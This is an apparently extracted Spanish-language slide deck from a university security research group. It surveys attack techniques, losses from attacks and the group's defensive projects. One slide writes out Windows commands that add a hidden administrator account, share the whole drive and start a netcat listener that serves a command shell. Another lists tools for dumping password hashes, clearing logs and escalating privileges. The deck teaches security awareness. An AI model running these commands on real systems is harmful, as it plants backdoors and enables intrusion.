Estrategias de Ataque y Defensa

18
ESTRATEGIAS DE ATAQUE EN SEGURIDAD INFORMATICA Grupo de I+D en Tecnologías de la Información (GTI) (Esp) Siler Amador Donado [email protected] http://gseguridad.unicauca.edu.co

description

Estrategias de Ataque y Defensa dirigido por el Ingeniero Siler Amador de la Unidad de Seguridad Informatica del la Universidad del Cauca.

Transcript of Estrategias de Ataque y Defensa

Page 1: Estrategias de Ataque y Defensa

ESTRATEGIAS DE ATAQUE EN SEGURIDAD

INFORMATICA

Grupo de I+D en Tecnologías de la Información (GTI)

(Esp) Siler Amador [email protected]

http://gseguridad.unicauca.edu.co

Page 2: Estrategias de Ataque y Defensa

AGENDAHackers vs CrackersEl riesgo en la seguridad informáticaPérdidas económicas por ataques informáticosTécnicas de ataqueVectores de ataque a una redY si tienen la oportunidad…Caja de herramientas de ataque La próxima generación de Troyanos KeylogersDemo 1 (Ataque Masivo)Demo 2 (Defaced)… Y en la Unicauca que?Conclusiones

Page 3: Estrategias de Ataque y Defensa

HACKERS VS CRACKERS

HackersHackers

Asesoran

Asesoran

Etic

aEt

ica

Construyen

Construyen

CrackersCrackers

EgoEgoíístas

stas

Del

incu

ente

sD

elin

cuen

tes

Destruyen

Destruyen

Page 4: Estrategias de Ataque y Defensa

EL RIESGO EN LA SEGURIDAD INFORMÁTICA

Page 5: Estrategias de Ataque y Defensa

PÉRDIDAS POR ATAQUES CCS/FBI 2005

Page 6: Estrategias de Ataque y Defensa

PÉRDIDAS POR ATAQUES CCS/FBI 2005

$67.2 billones por año

$7.6 millones por hora

Page 7: Estrategias de Ataque y Defensa

TECNICAS DE ATAQUE

Wardriving: Nombre que recibe la búsqueda de redes inalámbricas para documentar su posición. Para realizar esta búsqueda se necesita como mínimo un equipo móvil (portátil) con tarjeta Wireless, y si queremos que la posición sea precisa, un GPS para pasar los datos a un mapa.

Objetivo: Conectarse al punto de acceso (AP) mal configurado e ingresar a la la red local de la empresa.

Herramientas:NetStumblerKismethttp://www.wardrive.net/wardriving/tools

Page 8: Estrategias de Ataque y Defensa

TECNICAS DE ATAQUE

Wardialing: Fue una técnica de los 80´s y 90´s, consitía en marcar repetidamente a modems y PBX´s disponibles en la red y de esta forma irrumpir a sistemas remotos.

Objetivo: Conectarse a modems o PBX´s mal configurados e ingresar a la la red local de la empresa.

Herramientas: THC-Scan 2.0ModemScanShokDial

Page 9: Estrategias de Ataque y Defensa

TECNICAS DE ATAQUE

Cracking: Modificar un programa para obtener beneficios. Normalmente se basa en quitar pantallas introductorias, protecciones o, como en unas modificaciones de cierto programa de comunicaciones, conseguir nuevos passwords de acceso a sistemas.

Objetivo:Tener acceso al software o a la red interna.

Herramientas:Las 100 mejores http://sectools.org/Inyección SQLXSS

Page 10: Estrategias de Ataque y Defensa

TECNICAS DE ATAQUE

Ing. Social: Persuadir a otra persona (a través de diversas formas) para que nos de un dato útil para cumplir un objetivo. Este dato puede ser un password, un código, etc. incluso pueden dar nombres de familiares y fechas importantes, que siempre se usan para formar claves.

Objetivo: Obtener información sensible que nos permita el acceso a la red.

Herramientas: TeléfonoMucha psicologíaInteligencia emocionalhttp://www.laflecha.net/perfiles/tecnologia/kevin_mitnick/

Page 11: Estrategias de Ataque y Defensa

VECTORES DE ATAQUE A UNA REDPuntos de acceso

INTE

RN

ETIN

TER

NET M

OD

EMM

OD

EMWIRELESSWIRELESS

FISICOFISICO

REDRED

WardrivingWardriving

Ing. SocialIng. Social

Wardialing

WardialingC

rack

ing

Cra

ckin

g

Page 12: Estrategias de Ataque y Defensa

Y si tienen la oportunidad…

Menos de 1 minuto es suficiente para:1. Crear una cuenta con privilegios de Admin!!!

1. Abrir la consola de comandos2. C:\net user cracker siti2006 /add3. C:\net localgroup administradores cracker /add

2. Compartir toda la unidad del disco!!!1. C:\net share siti2006=c:\ /remark:”Demo SITI2006”

3. Colocar un programa en escucha!!!1. http://gseguridad.unicauca.edu.co/nc.exe2. C:\WINNT\System32\nc.exe -d -L -p 55555 -e cmd.exe

Page 13: Estrategias de Ataque y Defensa

Caja de Herramientas de ataque en línea de comandos

fport.exe - shows open ports and the process that owns the portiplist.exe - enumerates the ip's of the computermd5.exe - gets the md5 hash of a filepw2kget.exe - for win2k gets the password of the currently logged on userpwreveal.exe - gets the passwords of any window that has a ****** editboxregshell.exe - a commandline registry explorer/editorsendmail.exe - a commandline email senderuptime.exe - gets the machines current uptimexwhois - advanced whois lookupScreencap.exe - makes a screenshot of the screen and saves it to screenshot.bmpCMDget.exe - Downloads a file from a website from user provided parameterswebscr.exe - creates a snapshot from the webcam and saves itshutd.exe - program that forces shutdown/reboot of machinebnc.exe - bnc for windows (see bnc.cfg)clslog.exe - clears app/security/system logs XP/NT/2k enum.exe - enumerates IPC$ share to collect informationwinfo.exe - enumerates IPC$ share to collect informationFTPd.exe - small ftp server for dos (see slimftpd.conf)Global.exe - process dos command on all disc/subdirsiislog.exe - clears IIS logsInfo.exe - gets system informationispc.exe - spawns shell on hacked IIS (put idq.dll on remote script dir)nc.exe - netcatpv.exe - process manager for dosPwdump.exe - dumps SAM hashesscrnmode.exe - change screen mode from dosunrar.exe - unrar for doswget.exe - wget for windowswizmo.exe - command tool (see w.txt)dwpp.exe - dial up password graberwinrelay.exe - relay tcp/udp connectionsgetad.exe - escalate to admin user in w2kpipeup.exe - escalate to admin user in w2kdnsid - identify remore dns server

Agradecimientos a: NetrangerTomado de: http://www.governmentsecurity.org/forum/lofiversion/index.php/t2824.html

Page 14: Estrategias de Ataque y Defensa

LA PRÓXIMA GENERACION DE TROYANOS KEYLOGERS…

http://www.hispasec.com/laboratorio/troyano_video.htm

Page 15: Estrategias de Ataque y Defensa

DEMO1 - ATAQUE MASIVOEscenario

SITI 2006SITI 2006 LANLAN

ATACANTEATACANTE MAESTROMAESTRO

ZOMBIESZOMBIES

LinuxMetasploit

Scripts en Python

WindowsWin/XP/2K

http://www.microsoft.com/spain/technet/seguridad/boletines/ms05-039-it.mspx

Page 16: Estrategias de Ataque y Defensa

DEMO2 - DEFACED

VIDEO RUSOVIDEO RUSO

http://www.zone-h.com

Page 17: Estrategias de Ataque y Defensa

... Y en la Unicauca que?

• Electiva de seguridad informática• Área de interés en seguridad informática del GTI. (Proyectos de tesis

de grado)• Legislación en comercio electrónico (Finalizado)• OBSES (Firewall Cluster Beowulf) (Finalizado)• INFORCE (Finalizado)• Antivirus-inteligente (En desarrollo)• Estudio de las tendencias predictivas sobre la escogencia de

contraseñas basado en redes bayesianas (En desarrollo)• Proyecto de Auditoría informática UNICAUCA • Publicaciones

PreocupaciPreocupacióón del departamento de sistemas de la FIET sobre n del departamento de sistemas de la FIET sobre la problemla problemáática de la seguridad de la informacitica de la seguridad de la informacióón.n.

Page 18: Estrategias de Ataque y Defensa

CONCLUSIONESLos ataques de seguridad informática a nivel mundial son aislados? Inversión en guerra informática? ECHELON, ENFOPOL, CARNÍVORO…• USA• UK• CHINA• RUSIA

Los sistemas de seguridad actuales son reactivos y correctivos.• Preventivos• Inteligentes

Existen demasiadas herramientas de ataque gratis y disponibles en la red.Las técnicas de ataque cabian constantemente.Segun las estadísticas es muy probable que su sistema hayasido vulnerado y usted aún no lo sepa!!!.